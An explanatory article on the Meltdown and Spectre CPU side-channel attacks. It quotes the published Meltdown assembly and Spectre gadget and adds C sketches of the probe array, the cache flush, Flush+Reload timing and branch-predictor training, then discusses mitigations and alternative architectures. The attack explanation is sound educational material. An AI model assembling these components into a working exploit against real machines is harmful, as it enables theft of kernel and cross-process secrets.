The Register pieced together disparate sources of information to break the news of Meltdown and Spectre, two vulnerabilities that affect nearly every processor on the planet. I’m personally thankful to El Reg for bringing them into the open.
What is Meltdown?
In short, Meltdown is a side-channel attack that lets an unprivileged process discern privileged data values from cache timing (hits versus misses), and Spectre abuses speculative execution to trick the victim into performing operations that leak its information. While the illegal or mispredicted operations in both attacks are eventually caught and the CPU state is rolled back, the attacks still force the victim to execute code that it shouldn’t, and the cache side effects of that execution leak information.
Here’s the code for Meltdown given by Lipp, Schwarz, Gruss, Prescher, Haas, Mangard, Kocher, Genkin, Yarom, and Hamburg for an x86 processor:
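    ; rcx = kernel address
    ; rbx = probe array
    retry:
    mov al, byte [rcx]          ; read a kernel byte (transiently; faults at retirement)
    shl rax, 0xC                ; multiply by 4096: one page per possible byte value
    jz retry                    ; if the value read was 0, try again
    mov rbx, qword [rbx + rax]  ; touch probe[value * 4096], pulling it into the cache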
The code relies on speculative (more precisely, out-of-order) execution to reveal the contents of the memory location identified by rcx, which I will denote kernel[rcx]. Modern operating systems map the kernel into every process’s address space to make traps and system calls faster, even though the process generally doesn’t have permission to access that space. Consequently, the probe array, user[rbx], and the kernel data, kernel[rcx], live in the same virtual address space; I name them differently only to distinguish the privileged (kernel) space from the normal unprivileged (user) space.
The code begins after ensuring that the probe array (pointed to by rbx) is out of the cache. It uses a very large, page-sized stride for probe-array references: shl rax, 0xC shifts left by 12, that is, multiplies by 4 KB. Every possible byte value therefore gets its own page, and because hardware prefetchers typically do not cross page boundaries, the prefetcher cannot pull in neighboring entries and spoil the measurement.
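A minimal C sketch of the probe-array layout just described, under stated assumptions: the names PROBE_SHIFT, PROBE_STRIDE, PROBE_BYTES, probe_offset, and flush_probe are hypothetical, and the flush uses the SSE2 _mm_clflush intrinsic, so that part is compiled only on x86-64. The shift mirrors shl rax, 0xC, and each of the 256 byte values lands on its own 4 KB page.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#if defined(__x86_64__)
#include <emmintrin.h>  /* _mm_clflush (SSE2) */
#endif

/* Hypothetical names; the constants mirror the Meltdown listing. */
#define PROBE_SHIFT   12                          /* shl rax, 0xC */
#define PROBE_STRIDE  ((size_t)1 << PROBE_SHIFT)  /* 4096 bytes: one page per value */
#define PROBE_VALUES  256                         /* possible values of one byte */
#define PROBE_BYTES   (PROBE_VALUES * PROBE_STRIDE) /* 1 MB probe array */

/* Offset in the probe array touched for a given secret byte:
   the same computation as `shl rax, 0xC` before `[rbx + rax]`. */
size_t probe_offset(uint8_t value) {
    return (size_t)value << PROBE_SHIFT;
}

/* Evict every probe line from the cache before the attack
   (x86-64 only in this sketch; a no-op elsewhere). */
void flush_probe(const uint8_t *probe) {
    assert(probe != NULL);
#if defined(__x86_64__)
    for (size_t v = 0; v < PROBE_VALUES; v++)
        _mm_clflush(probe + probe_offset((uint8_t)v));
#else
    (void)probe;
#endif
}
```

For example, probe_offset(0x41) is 0x41000, the first byte of page 65 of the probe array.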
The key exploit is the mov al, byte [rcx] instruction, which reads kernel[rcx] and places it into the al register. This load is illegal because the process lacks permission to read kernel memory, but the permission check occurs in parallel with the memory operation: the CPU dutifully performs the illegal, privileged memory operation while checking whether it’s allowed, and the fault is not raised until the instruction retires. In the meantime, the simple arithmetic executes (shl, which is nothing but a quick way to multiply by 4 KB so that each potential byte value has its own page in the probe array).
The mov rbx, qword [rbx + rax] completes the attack by loading the probe-array (rbx) cache line selected by the offset in rax, which was itself derived from the privileged byte read by the first mov.
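To make the rollback concrete, here is a toy C model, which is hypothetical and not how real hardware is built: ToyCpu, transient_meltdown, and read_cached_value are illustrative names, the load is simplified to write all of rax rather than just al, and the jz retry step is omitted. The load, shift, and probe access run first; the permission fault then restores the architectural register, but the record of which probe page was cached survives.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Toy model: rax is architectural state; cached[] stands in for the
   microarchitectural state of the cache (one flag per probe page). */
typedef struct {
    uint64_t rax;
    bool cached[256];
} ToyCpu;

/* Models the listing executing transiently and then faulting at retirement.
   Simplification: the load writes all of rax instead of just al. */
bool transient_meltdown(ToyCpu *cpu, const uint8_t *kernel, size_t rcx) {
    assert(cpu != NULL && kernel != NULL);
    uint64_t checkpoint = cpu->rax;        /* architectural state to restore */

    cpu->rax = kernel[rcx];                /* mov al, byte [rcx]: runs before the check resolves */
    cpu->rax <<= 12;                       /* shl rax, 0xC */
    cpu->cached[cpu->rax >> 12] = true;    /* mov rbx, qword [rbx + rax]: line now cached */

    cpu->rax = checkpoint;                 /* fault at retirement: registers roll back... */
    return false;                          /* ...and the access "fails", but cached[] is untouched */
}

/* Attacker: the only probe page that is cached reveals the secret byte. */
int read_cached_value(const ToyCpu *cpu) {
    for (int v = 0; v < 256; v++)
        if (cpu->cached[v])
            return v;
    return -1;                             /* nothing leaked */
}
```

After the "failed" access, rax holds its old value, yet read_cached_value still returns the kernel byte.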
By the time the first mov raises its exception, the word from the probe array has already been loaded into the cache. The attacker simply has to suppress (or handle) the exception and determine which probe-array cache line is in the cache; there are only 256 candidates, one per possible byte value. Both are easily accomplished. In fact, hardware transactional memory (Intel TSX) speeds things up, because a faulting access inside a transaction simply aborts the transaction instead of delivering an exception to the process!
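The “which line is cached?” step is the reload half of Flush+Reload, the covert channel the Meltdown paper uses. A minimal C sketch, assuming an x86-64 compiler for the timing helper (it uses the __rdtscp intrinsic and omits the serializing fences a careful measurement would add) and a hypothetical hit threshold that a real attack would calibrate per machine. The names time_reload, recover_byte, and HIT_THRESHOLD_CYCLES are illustrative.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#if defined(__x86_64__)
#include <x86intrin.h>  /* __rdtscp */

/* Time one load of *p in timestamp-counter cycles: fast means cached. */
uint64_t time_reload(const volatile uint8_t *p) {
    unsigned int aux;                 /* receives IA32_TSC_AUX; unused here */
    uint64_t start = __rdtscp(&aux);
    uint8_t value = *p;               /* the timed access */
    uint64_t end = __rdtscp(&aux);
    (void)value;
    return end - start;
}
#endif

/* Hypothetical threshold; real attacks calibrate this per machine. */
#define HIT_THRESHOLD_CYCLES 100u

/* Given the reload latency of each of the 256 probe pages, return the byte
   value whose page reloaded fastest, or -1 if even that was a cache miss. */
int recover_byte(const uint64_t latency[256], uint64_t threshold) {
    assert(latency != NULL);
    int best = 0;
    for (int v = 1; v < 256; v++)
        if (latency[v] < latency[best])
            best = v;
    return latency[best] < threshold ? best : -1;
}
```

In a real run, each latency[v] would come from timing a reload of page v of the freshly flushed probe array right after the faulting access, usually repeated several times to filter noise.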
What is Spectre?
Not to be confused with the infamous organization of villains from Ian Fleming’s James Bond stories, this aptly named attack can be executed independently or combined with Meltdown. The attack is described by Kocher, Genkin, Gruss, Haas, Hamburg, Lipp, Mangard, Prescher, Schwarz, and Yarom. At its core is a bounds-checked array access in the victim:
    if (x < array1_size)
        y = array2[array1[x] * 256];
The value of x is fully within the attacker’s control. The attacker first trains the branch predictor to expect the branch to be taken (that is, to expect x < array1_size to be true). Then, as with Meltdown, the attacker supplies an out-of-bounds x: the processor speculatively executes the body anyway, array1[x] reads data the attacker isn’t privileged to access, and using that value as an index pulls a corresponding line of array2 into the cache, a side effect that reveals the data itself.
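A minimal C sketch of the victim and the training pattern, assuming the names from the snippet above plus a hypothetical helper, train_then_attack; the array sizes are illustrative. Architecturally the out-of-bounds call does nothing, which is exactly the point: the leak happens only in the speculative window. The real proof of concept also flushes array1_size and the array2 lines from the cache before the final call, so the bounds check resolves slowly, and then times array2 reloads with Flush+Reload; those steps are omitted here, so this code leaks nothing by itself.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Victim data, named as in the snippet; sizes are illustrative. */
unsigned int array1_size = 16;
uint8_t array1[16] = {1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16};
uint8_t array2[256 * 256];   /* one 256-byte slot per possible byte value */
uint8_t y;                   /* receives the loaded value */

/* The bounds-checked access from the snippet. */
void victim_function(size_t x) {
    if (x < array1_size)
        y = array2[array1[x] * 256];
}

/* Hypothetical helper: call the victim with an in-bounds index `rounds`
   times so the predictor learns "taken", then once with the malicious index.
   A mistrained CPU may speculatively read array1[malicious_x] on that call. */
void train_then_attack(size_t training_x, size_t malicious_x, int rounds) {
    assert(training_x < array1_size);
    for (int i = 0; i < rounds; i++)
        victim_function(training_x);
    victim_function(malicious_x);
}
```

Because the final call fails the bounds check architecturally, y still holds the value from the last in-bounds call.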
The simple version of this attack circumvents even processors that correctly refuse to speculate past an access that would page-fault, because the victim is only reading its own address space. Going further, the attacker can take a page from Return Oriented Programming (ROP) and use “gadgets” (small snippets of useful code in the victim or parent process) to execute code on the attacker’s behalf. In this case, instead of relying on a buffer overflow, the attacker tricks the branch predictor into speculatively executing gadgets in the victim, with the victim’s privileges, that the attacker itself has no access to.
The executed gadgets are “transient” in that the CPU squashes them and restores the architectural state once the misprediction or exception is detected; however, as we’ve already seen, it’s possible to exploit the side-channel information they leave behind.
The deployed patch for Meltdown, which isolates the kernel’s page tables from user space, has a significant performance impact, reportedly 20% or more on some workloads. Full kernel isolation is slow!
Why are we here and what can be done?
The authors suggest a number of potential defenses, but in some sense the attacks exploit fundamental architectural flaws. Simple measures such as not speculating across page faults help somewhat, but the relatively easy (though clever!) exploitation of side-effect information leaves computers fundamentally vulnerable. Spectre has no good solution short of addressing the fundamental architectural flaw (or disabling high-performance features in the processor!).
We could borrow a page from computing history and exploit other kinds of parallelism. Fine-grained multithreading, such as that exploited by the Cray/Tera MTA and by Burton Smith’s earlier machines, interleaves instructions from many threads so that a thread’s next instruction issues only after its previous one has completed; nothing needs to be speculated, which would guarantee that only valid instructions are executed. Given that hyperscale data centers make up 60% or more of the server market and that their workloads are often throughput-oriented, this could be a great match. It would likely require rethinking the memory hierarchy to support such processors, but there are great implementation possibilities with ISAs like ARM and, perhaps some day, RISC-V.
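A toy C model of why interleaving removes the need to speculate, under hypothetical parameters: the thread count and pipeline depth are illustrative, not the MTA’s real figures, and round_robin_never_speculates is an invented name. Each cycle, the processor issues one instruction from the next thread in strict round-robin order. If there are at least as many threads as pipeline stages, each thread’s previous instruction, including any branch, has completed before that thread’s turn comes around again.

```c
#include <assert.h>
#include <stdbool.h>

#define MAX_THREADS 256   /* arbitrary cap for this sketch */

/* Simulate `cycles` cycles of strict round-robin issue with `num_threads`
   hardware threads and an instruction latency of `pipeline_depth` cycles.
   Returns true if no thread ever had to issue while its previous instruction
   was still in flight, i.e. nothing needed to be speculated. */
bool round_robin_never_speculates(int num_threads, int pipeline_depth, int cycles) {
    assert(num_threads > 0 && num_threads <= MAX_THREADS && pipeline_depth > 0);
    int last_issue[MAX_THREADS];
    for (int t = 0; t < num_threads; t++)
        last_issue[t] = -pipeline_depth;      /* nothing in flight at start */

    for (int cycle = 0; cycle < cycles; cycle++) {
        int t = cycle % num_threads;          /* whose turn it is */
        if (cycle - last_issue[t] < pipeline_depth)
            return false;                     /* would have to guess past an unresolved instruction */
        last_issue[t] = cycle;                /* issue one instruction from thread t */
    }
    return true;
}
```

The price is single-thread speed: each thread issues at most once every num_threads cycles, which is why this design suits throughput-oriented work.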
On the flip side, not all workloads are throughput-oriented, and speculative out-of-order execution has been a cornerstone of computer architecture for six decades. Fundamentally, the vulnerability results from unbalanced machine hierarchies that value processors over memory, and there are significant opportunities to fix it in the memory system. These include:
- Smarter, distributed permission checking;
- Investing more in memory performance rather than already plentiful processor performance (after all, executing lots of math instructions on a small amount of data doesn’t represent today’s information era!);
- Better processor architectures, including features for security and reliability; and finally,
- More diversity of architectures, which is already underway given the slowing of Moore’s Law, to “raise the bar” for the attacker.
None of these represents a “silver bullet”, and all of them have complex tradeoffs. Ultimately, where cybersecurity is concerned, the bar can be raised, but nothing is “perfectly secure”.